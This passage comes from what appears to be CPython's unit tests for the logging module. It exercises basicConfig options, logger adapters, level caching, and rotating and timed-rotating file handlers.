self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
# test the default value introduced in 3.7
# (Issue #28524)
logging.disable()
self.assertEqual(logging.root.manager.disable, logging.CRITICAL)
def _test_log(self, method, level=None):
called = []
support.patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
def test_subclass_logger_cache(self):
# bpo-37258
message = []
class MyLogger(logging.getLoggerClass()):
def __init__(self, name='MyLogger', level=logging.NOTSET):
super().__init__(name, level)
message.append('initialized')
logging.setLoggerClass(MyLogger)
logger = logging.getLogger('just_some_logger')
self.assertEqual(message, ['initialized'])
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger.addHandler(h)
try:
logger.setLevel(logging.DEBUG)
logger.debug("hello")
self.assertEqual(stream.getvalue().strip(), "hello")
stream.truncate(0)
stream.seek(0)
logger.setLevel(logging.INFO)
logger.debug("hello")
self.assertEqual(stream.getvalue(), "")
finally:
logger.removeHandler(h)
h.close()
logging.setLoggerClass(logging.Logger)
@support.requires_type_collecting
def test_logging_at_shutdown(self):
# Issue #20037
code = """if 1:
import logging
class A:
def __del__(self):
try:
raise ValueError("some error")
except Exception:
logging.exception("exception in __del__")
a = A()"""
rc, out, err = assert_python_ok("-c", code)
err = err.decode()
self.assertIn("exception in __del__", err)
self.assertIn("ValueError: some error", err)
def test_recursion_error(self):
# Issue 36272
code = """if 1:
import logging
def rec():
logging.error("foo")
rec()
rec()"""
rc, out, err = assert_python_failure("-c", code)
err = err.decode()
self.assertNotIn("Cannot recover from stack overflow.", err)
self.assertEqual(rc, 1)
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
def test_multiprocessing(self):
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
try:
import multiprocessing as mp
r = logging.makeLogRecord({})
self.assertEqual(r.processName, mp.current_process().name)
except ImportError:
pass
def test_optional(self):
r = logging.makeLogRecord({})
NOT_NONE = self.assertIsNotNone
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
r = logging.makeLogRecord({})
NONE = self.assertIsNone
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
def setUp(self):
super(BasicConfigTest, self).setUp()
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.setLevel(self.original_logging_level)
def test_no_kwargs(self):
logging.basicConfig()
# handler defaults to a StreamHandler to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_strformatstyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="{")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_stringtemplatestyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="$")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_filename(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_filemode(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='%(asctime)s - %(message)s')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, '%(asctime)s - %(message)s')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
# Issue 23207: test for invalid kwargs
assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO)
# Should pop both filename and filemode even if filename is None
logging.basicConfig(filename=None, filemode='a')
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def test_force(self):
old_string_io = io.StringIO()
new_string_io = io.StringIO()
old_handlers = [logging.StreamHandler(old_string_io)]
new_handlers = [logging.StreamHandler(new_string_io)]
logging.basicConfig(level=logging.WARNING, handlers=old_handlers)
logging.warning('warn')
logging.info('info')
logging.debug('debug')
self.assertEqual(len(logging.root.handlers), 1)
logging.basicConfig(level=logging.INFO, handlers=new_handlers,
force=True)
logging.warning('warn')
logging.info('info')
logging.debug('debug')
self.assertEqual(len(logging.root.handlers), 1)
self.assertEqual(old_string_io.getvalue().strip(),
'WARNING:root:warn')
self.assertEqual(new_string_io.getvalue().strip(),
'WARNING:root:warn\nINFO:root:info')
def test_encoding(self):
try:
encoding = 'utf-8'
logging.basicConfig(filename='test.log', encoding=encoding,
errors='strict',
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
self.assertEqual(data,
'The Øresund Bridge joins Copenhagen to Malmö')
def test_encoding_errors(self):
try:
encoding = 'ascii'
logging.basicConfig(filename='test.log', encoding=encoding,
errors='ignore',
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
self.assertEqual(data, 'The resund Bridge joins Copenhagen to Malm')
def test_encoding_errors_default(self):
try:
encoding = 'ascii'
logging.basicConfig(filename='test.log', encoding=encoding,
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
self.assertEqual(handler.errors, 'backslashreplace')
logging.debug('😂: ☃️: The Øresund Bridge joins Copenhagen to Malmö')
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
self.assertEqual(data, r'\U0001f602: \u2603\ufe0f: The \xd8resund '
r'Bridge joins Copenhagen to Malm\xf6')
def test_encoding_errors_none(self):
# Specifying None should behave as 'strict'
try:
encoding = 'ascii'
logging.basicConfig(filename='test.log', encoding=encoding,
errors=None,
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
self.assertIsNone(handler.errors)
message = []
def dummy_handle_error(record):
_, v, _ = sys.exc_info()
message.append(str(v))
handler.handleError = dummy_handle_error
logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
self.assertTrue(message)
self.assertIn("'ascii' codec can't encode "
"character '\\xd8' in position 4:", message[0])
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
# didn't write anything due to the encoding error
self.assertEqual(data, r'')
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
support.patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_exception_excinfo(self):
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception('exc_info test', exc_info=exc)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
def test_nested(self):
class Adapter(logging.LoggerAdapter):
prefix = 'Adapter'
def process(self, msg, kwargs):
return f"{self.prefix} {msg}", kwargs
msg = 'Adapters can be nested, yo.'
adapter = Adapter(logger=self.logger, extra=None)
adapter_adapter = Adapter(logger=adapter, extra=None)
adapter_adapter.prefix = 'AdapterAdapter'
self.assertEqual(repr(adapter), repr(adapter_adapter))
adapter_adapter.log(logging.CRITICAL, msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, f"Adapter AdapterAdapter {msg}")
self.assertEqual(record.args, (self.recording,))
orig_manager = adapter_adapter.manager
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
temp_manager = object()
try:
adapter_adapter.manager = temp_manager
self.assertIs(adapter_adapter.manager, temp_manager)
self.assertIs(adapter.manager, temp_manager)
self.assertIs(self.logger.manager, temp_manager)
finally:
adapter_adapter.manager = orig_manager
self.assertIs(adapter_adapter.manager, orig_manager)
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
class LoggerTest(BaseTest):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assertRaises(TypeError, self.logger.setLevel, object())
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
with support.swap_attr(logging, 'raiseExceptions', True):
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
with support.swap_attr(logging, 'raiseExceptions', False):
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
support.patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_find_caller_with_stacklevel(self):
the_level = 1
def innermost():
self.logger.warning('test', stacklevel=the_level)
def inner():
innermost()
def outer():
inner()
records = self.recording.records
outer()
self.assertEqual(records[-1].funcName, 'innermost')
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'inner')
self.assertGreater(records[-1].lineno, lineno)
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'outer')
self.assertGreater(records[-1].lineno, lineno)
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'test_find_caller_with_stacklevel')
self.assertGreater(records[-1].lineno, lineno)
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_is_enabled_for_disabled_logger(self):
old_disabled = self.logger.disabled
old_disable = self.logger.manager.disable
self.logger.disabled = True
self.logger.manager.disable = 21
self.addCleanup(setattr, self.logger, 'disabled', old_disabled)
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('root'))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
def test_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in ('', 'root', 'foo', 'foo.bar', 'baz.bar'):
logger = logging.getLogger(name)
s = pickle.dumps(logger, proto)
unpickled = pickle.loads(s)
self.assertIs(unpickled, logger)
def test_caching(self):
root = self.root_logger
logger1 = logging.getLogger("abc")
logger2 = logging.getLogger("abc.def")
# Set root logger level and ensure cache is empty
root.setLevel(logging.ERROR)
self.assertEqual(logger2.getEffectiveLevel(), logging.ERROR)
self.assertEqual(logger2._cache, {})
# Ensure cache is populated and calls are consistent
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
self.assertFalse(logger2.isEnabledFor(logging.DEBUG))
self.assertEqual(logger2._cache, {logging.ERROR: True, logging.DEBUG: False})
self.assertEqual(root._cache, {})
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
# Ensure root cache gets populated
self.assertEqual(root._cache, {})
self.assertTrue(root.isEnabledFor(logging.ERROR))
self.assertEqual(root._cache, {logging.ERROR: True})
# Set parent logger level and ensure caches are emptied
logger1.setLevel(logging.CRITICAL)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
# Ensure logger2 uses parent logger's effective level
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
# Set level to NOTSET and ensure caches are empty
logger2.setLevel(logging.NOTSET)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Verify logger2 follows parent and not root
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
self.assertTrue(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger1.isEnabledFor(logging.ERROR))
self.assertTrue(logger1.isEnabledFor(logging.CRITICAL))
self.assertTrue(root.isEnabledFor(logging.ERROR))
# Disable logging in manager and ensure caches are clear
logging.disable()
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Ensure no loggers are enabled
self.assertFalse(logger1.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(root.isEnabledFor(logging.CRITICAL))
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
        # If maxBytes is zero, rollover never occurs
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# checks that the file is created and assumes it was created
# by us
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
def test_namer_rotator_inheritance(self):
class HandlerWithNamerAndRotator(logging.handlers.RotatingFileHandler):
def namer(self, name):
return name + ".test"
def rotator(self, source, dest):
if os.path.exists(source):
os.rename(source, dest + ".rotated")
rh = HandlerWithNamerAndRotator(
self.fn, backupCount=2, maxBytes=1)
self.assertEqual(rh.namer(self.fn), self.fn + ".test")
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(rh.namer(self.fn + ".1") + ".rotated")
self.assertFalse(os.path.exists(rh.namer(self.fn + ".1")))
rh.close()
@support.requires_zlib
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.rotator = rotator
rh.namer = namer
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
# other test methods added below
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
# print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', delay=True)
def test_compute_rollover_daily_attime(self):
currentTime = 0
atTime = datetime.time(12, 0, 0)
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='MIDNIGHT', interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
actual = rh.computeRollover(currentTime)
self.assertEqual(actual, currentTime + 12 * 60 * 60)
actual = rh.computeRollover(currentTime + 13 * 60 * 60)
self.assertEqual(actual, currentTime + 36 * 60 * 60)
finally:
rh.close()
#@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
def test_compute_rollover_weekly_attime(self):
currentTime = int(time.time())
today = currentTime - currentTime % 86400
atTime = datetime.time(12, 0, 0)
wday = time.gmtime(today).tm_wday
for day in range(7):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='W%d' % day, interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
if wday > day:
# The rollover day has already passed this week, so we
# go over into next week
expected = (7 - wday + day)
else:
expected = (day - wday)
# At this point expected is in days from now, convert to seconds
expected *= 24 * 60 * 60
# Add in the rollover time
expected += 12 * 60 * 60
# Add in adjustment for today
expected += today
actual = rh.computeRollover(today)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
if day == wday:
# goes into following week
expected += 7 * 24 * 60 * 60
actual = rh.computeRollover(today + 13 * 60 * 60)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
finally:
rh.close()
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
